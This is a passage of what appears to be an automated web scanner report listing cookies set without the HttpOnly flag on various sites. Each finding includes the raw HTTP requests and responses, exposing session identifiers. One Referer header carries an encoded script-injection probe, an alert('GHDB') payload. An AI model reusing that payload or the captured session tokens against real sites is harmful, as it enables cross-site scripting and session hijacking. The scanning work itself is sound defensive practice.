Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=607787AE9CA83B1C07389AEFC2EF256A; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:13 GMT; Path=/
ETag: W/"318-1282158794000"
Last-Modified: Wed, 18 Aug 2010 19:13:14 GMT
Content-Length: 318
Date: Thu, 12 May 2011 01:08:12 GMT
Server: Apache-Coyote/1.1

...[SNIP]...

13.9. https://support.connexon.com/images/spacer.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/spacer.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=3E33D7090110A52AF1A2EDAFA1C24EAD; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:10 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:10 GMT
ETag: W/"43-1282158794000"
Last-Modified: Wed, 18 Aug 2010 19:13:14 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 01:08:10 GMT
Server: Apache-Coyote/1.1


13.10. https://support.connexon.com/sd/SolutionsHome.sd

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /sd/SolutionsHome.sd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sd/SolutionsHome.sd HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.911enable.com/login/index.php

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=270247465902DF59F63589A1CC79528E; Path=/sd
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:08 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 13742


<html>
<link type="text/css" rel="stylesheet" href="../style/style.css?aa">
<link type="text/css" rel="stylesheet" href="../style/demo.css">
<link rel="SHORTCUT ICON" hre
...[SNIP]...

13.11. https://support.connexon.com/style/demo.css

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /style/demo.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/demo.css HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 404 /style/demo.css
Set-Cookie: JSESSIONID=CF1B4E8028A2944A1E644EE9D78DB960; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:09 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 997
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1

<html><head><title>Apache Tomcat/5.0.28 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

13.12. https://support.connexon.com/style/style.css

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /style/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/style.css?aa HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=AF295E2F29DA2AF72D8D0F33050CAE08; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:12 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:12 GMT
ETag: W/"320710-1282158796000"
Last-Modified: Wed, 18 Aug 2010 19:13:16 GMT
Content-Type: text/css
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:11 GMT
Server: Apache-Coyote/1.1
Content-Length: 320710

/* $Id: style.css,v 1.287 2010/06/11 07:36:28 vijay Exp $ */
@import url("htmlarea.css");
@import url("combo.css");
@import url("common.css");
@import url("menu.css");
@import url("cal_style.css");
...[SNIP]...

13.13. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

Summary

Severity:   Low
Confidence:   Firm
Host:   http://support.sprint.com
Path:   /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547 HTTP/1.1
Host: support.sprint.com
Proxy-Connection: keep-alive
Referer: http://shop2.sprint.com/en/support/faq/wlnp.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: Apache=173.193.214.243.1305161164637776; path=/
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
Set-Cookie: JSESSIONID=E03DE23D7995866D54F37C7F07F26CB3.support4; Path=/
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLFByb2plY3RJbnN0YWxsLzkuMCBbIERQU0xpY2Vuc2UvMCBCMkJMaWNlbnNlLzAgIF0=
cache-control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: RecentlyViewedArticle=case-wh164052-20100420-140547:article_text; Expires=Sat, 11-Jun-2011 00:55:43 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 65521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml
...[SNIP]...

13.14. http://www.911enable.com/business/contact_specialist.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.911enable.com
Path:   /business/contact_specialist.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/contact_specialist.php?provenance=empty HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/login/index.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.5.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=r2burfmm6jqje8vo1bf8orrin2; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:07:16 GMT
Content-Length: 23673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...

13.15. http://www.atis.org/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.atis.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.atis.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26119
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASRRCDST=NDEPFBJBICBGPNEIFEPGGFBC; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="stylesheet" href="../css/atis.css">
<meta http-equiv="Content-Type"
...[SNIP]...

13.16. http://www.commpartnersconnect.com/company

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.commpartnersconnect.com
Path:   /company

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /company?number=&command=AJAXlookup&f=json&format=json&jsoncallback=jsonp1305161150243 HTTP/1.1
Host: www.commpartnersconnect.com
Proxy-Connection: keep-alive
Referer: http://www.onwav.com/lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:50:34 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.2.2
Set-Cookie: PHPSESSID=ff8626b16a6dd1021d5cc9da25521ffc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 89
Connection: close
Content-Type: text/html; charset=UTF-8

<p class=pageTitle style="color:red">Unable to get LNP Status - contact Commparnters.</p>

13.17. http://www.job-search-engine.com/keyword/number-portability/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.job-search-engine.com
Path:   /keyword/number-portability/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /keyword/number-portability/ HTTP/1.1
Host: www.job-search-engine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 00:45:54 GMT
Server: CherryPy/3.1.2
Set-Cookie: JUJUSESSIONID=b7da80c1b1571de1738a086cbc20d5e2597a6eea; Path=/
Set-Cookie: jpp=10; Path=/
Set-Cookie: session_id=b7da80c1b1571de1738a086cbc20d5e2597a6eea; expires=Thu, 12 May 2011 01:45:54 GMT; Path=/
Vary: Accept-Encoding
Via: 1.1 www.job-search-engine.com
Connection: keep-alive
Content-Length: 45948


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

13.18. http://www.linkedin.com/companyInsider

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /companyInsider

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /companyInsider?script&useBorder=no HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; __qca=P0-87169230-1303163602430; bcookie="v=1&4d9675db-dcd4-4b34-bfd9-5f98cf2c89da"; __utmz=23068709.1304721517.5.2.utmcsr=socialfollow.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=23068709.2028061763.1303163602.1304000549.1304721517.5; __utmv=23068709.guest

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:8tR8AXa_H87sybQCohL0f5rN4fe7m5AJEEzQz9agYlq3KAZCF6aP-d:1305161207:bd31acd81eafdc11524936bd768546496be4bb6b"; Version=1; Max-Age=1799; Expires=Thu, 12-May-2011 01:16:46 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:8157137445058115307"; Version=1; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 00:46:46 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19964145525d5f4f58455e445a4a42198c;expires=Thu, 12-May-2011 01:18:01 GMT;path=/;httponly
Content-Length: 12412

(function() {

// Set up LinkedIn Global Namespace
if (typeof(LinkedIn) == 'undefined') {
LinkedIn = {};
}

// Utility functions
function $(element) {
return (typeof element == 'string') ?

...[SNIP]...

13.19. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...

13.20. http://www.secviz.org/node/89

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.secviz.org
Path:   /node/89

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /node/89 HTTP/1.1
Host: www.secviz.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:56 GMT
Server: Apache/2.2.17
Set-Cookie: SESS511f69598f6d24673b9cd181bd44c360=3679a5a8e5f156807fb4105e9bf204df; expires=Sat, 04-Jun-2011 04:22:16 GMT; path=/; domain=.secviz.org
Last-Modified: Wed, 11 May 2011 22:47:09 GMT
ETag: "13ef58d2264914230329c15df5277159"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 17680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>The D
...[SNIP]...

13.21. http://www.westcongroup.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.westcongroup.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.westcongroup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:10:25 GMT
Server: Apache/2.2.8 (EL)
Set-Cookie: JSESSIONID=4BD344F3D5761EE1EA0C84F83F989EB1; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 26571


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...

13.22. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;225879025;40290099;m HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.vonage.com/lp/US/afflpdc/?refer_id=AFLGN090801001W1&promo_id=USVONRP2499NSC_WEB&deviceType=VDV21_FREE_UPSELL
Set-Cookie: id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 12 May 2011 00:50:28 GMT
Server: GFE/2.0
Content-Type: text/html


13.23. http://anpisolutions.app4.hubspot.com/salog.js.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://anpisolutions.app4.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: anpisolutions.app4.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 498
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=V8Dkeg8vzQEkAAAAODIzNjFhODYtN2M0OS00MGY2LTkzNTItOTk2NjRmMDI4YWIy0; expires=Fri, 11-May-2012 00:46:19 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=16f8b9e2-e345-4500-a8d4-a6d152516a13; domain=anpisolutions.app4.hubspot.com; expires=Tue, 11-May-2021 05:00:00 GMT; path=/; HttpOnly
Date: Thu, 12 May 2011 00:46:19 GMT
Set-Cookie: HUBSPOT95=185668780.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 11620;
var hsWeekEndsIn = 357220;
var hsMonthEndsIn = 1739620;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-11 20:46
...[SNIP]...

13.24. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=662363118&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.redskye911.com%252Fe911_products%252F%26jsref%3Dhttp%253A%252F%252Fwww.redskye911.com%252F%26rnd%3D1305162438995&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&jsref=http%3A%2F%2Fwww.redskye911.com%2F&rnd=1305162438995
Cookie: UID=7278cea-24.143.206.58-1297260492

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 01:07:20 GMT
Connection: close
Set-Cookie: UID=7278cea-24.143.206.58-1297260492; expires=Sat, 11-May-2013 01:07:20 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.25. https://lnp.activationnow.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lnp.activationnow.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413; LNP=pabetaptel15p-lnp

Response

HTTP/1.1 404 Not Found
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Connection: close
